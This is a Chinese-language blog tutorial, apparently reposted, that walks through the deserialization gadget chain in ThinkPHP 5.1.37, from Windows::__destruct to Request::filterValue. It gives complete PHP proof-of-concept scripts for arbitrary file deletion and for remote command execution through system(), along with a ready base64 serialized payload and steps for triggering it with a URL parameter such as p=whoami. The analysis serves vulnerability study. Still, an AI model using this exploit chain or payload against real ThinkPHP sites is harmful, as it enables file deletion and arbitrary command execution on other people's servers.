如何理解thinkphp5.1.37反序列化,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
纸上得来终觉浅,绝知此事要躬行。网上已经有很多分析的文章了,但是我还是决定按自己的理解写一下分析利用过程,化繁为简、深入浅出让它看起来更容易懂一些,降低理解的难度。
下载地址:
应用项目:https://github.com/top-think/think
核心框架:https://github.com/top-think/framework
把framework修改为thinkphp放入到thinkphp5.1.37文件夹中这样整个框架就搭建好了
反序列化链涉及到的文件:
起点文件-> thinkphp/library/think/process/pipes/Windows.php
thinkphp/library/think/model/concern/Conversion.php
thinkphp/library/think/model/concern/ Attribute.php
thinkphp/library/think/model/concern/ RelationShip.php
thinkphp/library/think/Model.php
thinkphp/library/think/Pivot.php
终点文件-> thinkphp/library/think/Request.php
是不是觉得文件很多,头很大,那我们来简化一下
起点文件-> thinkphp/library/think/process/pipes/Windows.php
thinkphp/library/think/Pivot.php
终点文件-> thinkphp/library/think/Request.php
为什么这样写呢因为 Conversion、Attribute 和RelationShip是trait类,其代码可以复用,而model类复用了这三个文件的代码所以我们就可以把这四个文件看做一个文件,然而model类文件是abstract(抽象)类不能直接使用,pivot类继承了model类,所以pivot文件相当于这四个文件的一个集.合体。所以我们只用关注Windows.php、Pivot.php、Request.php这三个文件。
涉及到的方法:
Windows.php 下的 __destruct()方法、removeFiles()
Conversion.php 下的__toString()方法、toJson()方法、toArray()方法
RelationShip.php 下的getRelation()方法
Attribute.php 下的getAttr()方法、getData()方法
Request.php 下的__call()方法、isAjax()方法、param()方法、input()方法、filterValue()方法
这其中Conversion.php、RelationShip.php、Attribute.php 下的方法可以理解为Pivot.php的方法
我们把这个利用链路划分为三个小目标:
1、利用Windows类激活__toString()魔术方法。
2、利用Pivot.类激活__call()魔术方法
3、利用Request类实现代码执行
利用链如下:
__destruct() —>removeFiles() —>_toString() —>toJson() —>toArray() —>getRelation() —>getAttr() —>getData() —>__call() —>isAjax() —>param() —>input() —>filterValue()
代码分析:
Windows对象在进行反序列化操作时会执行析构方法__destruct(),然后调用了removeFiles方法在removeFiles方法中会判断$this->files是不是存在存在即删除,因此这里存在任意文件删除,我们只要在生成windowsdu对象时进行$this->file赋值为一个文件的路径,那么反序列化时就会删除这个文件。
public function __destruct() { $this->close(); $this->removeFiles(); } private function removeFiles() { foreach ($this->files as $filename) { if (file_exists($filename)) { @unlink($filename); } } $this->files = []; }poc任意文件删除:
<?php namespace think/process/pipes; class Windows{ private $files = []; public function __construct(){ $this->files=['d:/1.txt']; } } echo base64_encode(serialize(new Windows()));
在file_exists()函数中如果传入的参数是一个对象的话,那么就会把这个对象当做字符串,这样就会触发对象的__toString()魔术方法,而恰好在Conversion类中实现了这个方法(成功实现第一个小目标),在Conversion类的__toString中又调用了toJson方法、toJson中又调用了toArray方法、
public function __toString() { return $this->toJson(); } public function toJson($options = JSON_UNESCAPED_UNICODE) { return json_encode($this->toArray(), $options); } // 追加属性(必须定义获取器) if (!empty($this->append)) { foreach ($this->append as $key => $name) { if (is_array($name)) { // 追加关联对象属性 $relation = $this->getRelation($key); if (!$relation) { $relation = $this->getAttr($key); $relation->visible($name); }
在toArray中我们要控制$this->append的值不能为空数组,而且数组中的$name必须是一个数组,那么就会执行getRelation方法。所以这里呢我们在进行序列化时赋值$this->append=[‘aa’=>[]]那么$key=’aa’跟进getRelation方法。
public function getRelation($name = null) {//此处的$name='aa' if (is_null($name)) { return $this->relation; } elseif (array_key_exists($name, $this->relation)) { return $this->relation[$name]; } return; }
在getRelation方法我们只要控制返回一个空值就好了;这就要求$name的值不能为null而且$name不是$this->relation这个数组中的一个键、$this->relation的值我们是可以控制的。当$relation值为假的时候那么就会执行getAttr方法,我们跟进getAttr方法。
public function getAttr($name, &$item = null) { try { $notFound = false; //此时方法中的$name=’aa’ $value = $this->getData($name); } catch (InvalidArgumentException $e) { $notFound = true; $value = null; }
调用了getDate方法此时的参数$name=’aa’、继续跟进
public function getData($name = null) { if (is_null($name)) { return $this->data; } elseif (array_key_exists($name, $this->data)) { return $this->data[$name]; } elseif (array_key_exists($name, $this->relation)) { return $this->relation[$name]; } throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name); }
getDate的返回值为$this->data[$name]; 值$this->data的值是可控的我们可以在序列化时赋值$this->data=[‘aa’=>new Request()];没错返回值是一个request对象,为什么要返回request对象呢?是因为request对象中实现了一个__call()魔术方法。
if (!$relation) {
$relation = $this->getAttr($key);
$relation->visible($name);
}
在这里$relation为一个request对象,request对象调用visible方法时,因为request对象没有visible方法就会激活__call魔术方法(成功实现第二个小目标),下面跟进request类的__call方法。
public function __call($method, $args)
{
if (array_key_exists($method, $this->hook)) {
array_unshift($args, $this);
return call_user_func_array($this->hook[$method], $args);
}
throw new Exception('method not exists:' . static::class . '->' . $method);
}
这里的call_user_func_array回调函数会调用$this->hook[$method] 中的方法来处理args
这里的$method= ’visible’在进行序列化时我们对$this->hook进行赋值$this->hook=[‘visible’=>[$this,isAjax]] 意思就是调用request类的isAjax方法来处理$args.跟进isAJax方法:
public function isAjax($ajax = false)
{
$value = $this->server('HTTP_X_REQUESTED_WITH');
$result = 'xmlhttprequest' == strtolower($value) ? true : false;
if (true === $ajax) {
return $result;
}
$result = $this->param($this->config['var_ajax']) ? true : $result;
$this->mergeParam = false;
return $result;
}
这其中调用了param方法参数为$this->config['var_ajax']) 在进行序列化时我们对$this->config进行赋值$this->config=[‘var_ajax =>’p’]
public function param($name = '', $default = null, $filter = '')
{
……
//这里可以理解为$this->param=$_GET获取get传参。
$this->param = array_merge($this->param, $this->get(false), $vars, $this->route(false));
//此处$name=$this->config[‘var_ajax ]=‘p’
return $this->input($this->param, $name, $default, $filter);
}
我们跟进$this->get方法看一下
public function get($name = '', $default = null, $filter = '')
{
if (empty($this->get)) {
$this->get = $_GET;
}
return $this->input($this->get, $name, $default, $filter);
}
其实就是把url中get传的值添加到$this->param数组里面。
随后调用了input方法,传参$data=$this->param,$name=’p’
public function input($data = [], $name = '', $default = null, $filter = '')
{
……
$data = $this->getData($data, $name);
// 解析过滤器
$filter = $this->getFilter($filter, $default);
if (is_array($data)) {
array_walk_recursive($data, [$this, 'filterValue'], $filter);
}
}
Input方法中调用了 $data = $this->getData($data, $name);我们查看一下getData方法
protected function getData(array $data, $name)
{
foreach (explode('.', $name) as $val) {
if (isset($data[$val])) {
$data = $data[$val];
} else {
return;
}
}
return $data;
}
就是从参数$data中取得数组健为$name的值,所以$data=$data[$name]= $data[‘p’]
Input方法中调用$filter = $this->getFilter($filter, $default)跟进分析
protected function getFilter($filter, $default)
{
if (is_null($filter)) {
$filter = [];
} else {
$filter = $filter ?: $this->filter;
if (is_string($filter) && false === strpos($filter, '/')) {
$filter = explode(',', $filter);
} else {
$filter = (array) $filter;
}
}
$filter[] = $default;
return $filter;
}
所以$filter=$this->filter并转为数组,我们在进行序列化的时候可以对其进行赋值.$filter=’system’所以这里返回的就是[‘system’]并作为filter参数传给filtervalue方法
后面的array_walk_recursive($data, [$this, 'filterValue'], $filter)意思就是调用filtervalue方法对$data进行处理$filter是参数,跟进filterfalue方法查看一下
private function filterValue(&$value, $key, $filters)
{
$default = array_pop($filters);
foreach ($filters as $filter) {
if (is_callable($filter)) {
// 调用函数或者方法过滤
$value = call_user_func($filter, $value);
call_user_func方法就是命令执行的终点,这里的$value=$this->param[‘p’],$filter=[system]也就是说用system函数来执行$value,$value的值可以视为访问链接的时候提交的一个参数
/?p=whoami 最后执行的就是 system(‘whoami’)(实现第三个小目标),至此整改利用链构造完成。
代码执行POC如下:
<?php
namespace think;
class Model{
//私有属性不能在子类中修改
private $data=[];
public function __construct(){
$this->data=['aa'=>new Request];
}
}
namespace think;
class Request
{
protected $config = ['var_ajax' => 'p'];
protected $filter='system';
//必须初始化param变量为数组
protected $param = [];
protected $hook;
public function __construct(){
$this->hook=['visible'=>[$this,'isAjax']];
}
}
namespace think/model;
use think/Model;
class Pivot extends Model{
protected $append = ['aa'=>[]];
}
namespace think/process/pipes;
use think/model/Pivot;
class Windows
{
private $files = [];
function __construct(){
$this->files=[new Pivot()];
}
}
echo base64_encode(serialize(new windows));
利用过程如下:
1、把poc放到web服务器并进行访问生成payload
TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czoyOiJhYSI7YTowOnt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6MjoiYWEiO086MTM6InRoaW5rXFJlcXVlc3QiOjQ6e3M6OToiACoAY29uZmlnIjthOjE6e3M6ODoidmFyX2FqYXgiO3M6MToicCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7czo4OiIAKgBwYXJhbSI7YTowOnt9czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo3O2k6MTtzOjY6ImlzQWpheCI7fX19fX19fQ==
2、把payload放到tp框架里并进行反序列化操作
Thinkphp5.1.37/public/index.php文件
<?phpnamespace app/index/controller;
class Index
{
public function index()
{
unserialize(base64_decode("TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czoyOiJhYSI7YTowOnt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6MjoiYWEiO086MTM6InRoaW5rXFJlcXVlc3QiOjQ6e3M6OToiACoAY29uZmlnIjthOjE6e3M6ODoidmFyX2FqYXgiO3M6MToicCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7czo4OiIAKgBwYXJhbSI7YTowOnt9czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo3O2k6MTtzOjY6ImlzQWpheCI7fX19fX19fQ=="));
}
public function hello($name = 'ThinkPHP5')
{
return 'hello,' . $name;
}
}
3、访问框架并提交参数p的值为你想执行的命令
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。
原创文章,作者:6024010,如若转载,请注明出处:https://blog.ytso.com/227644.html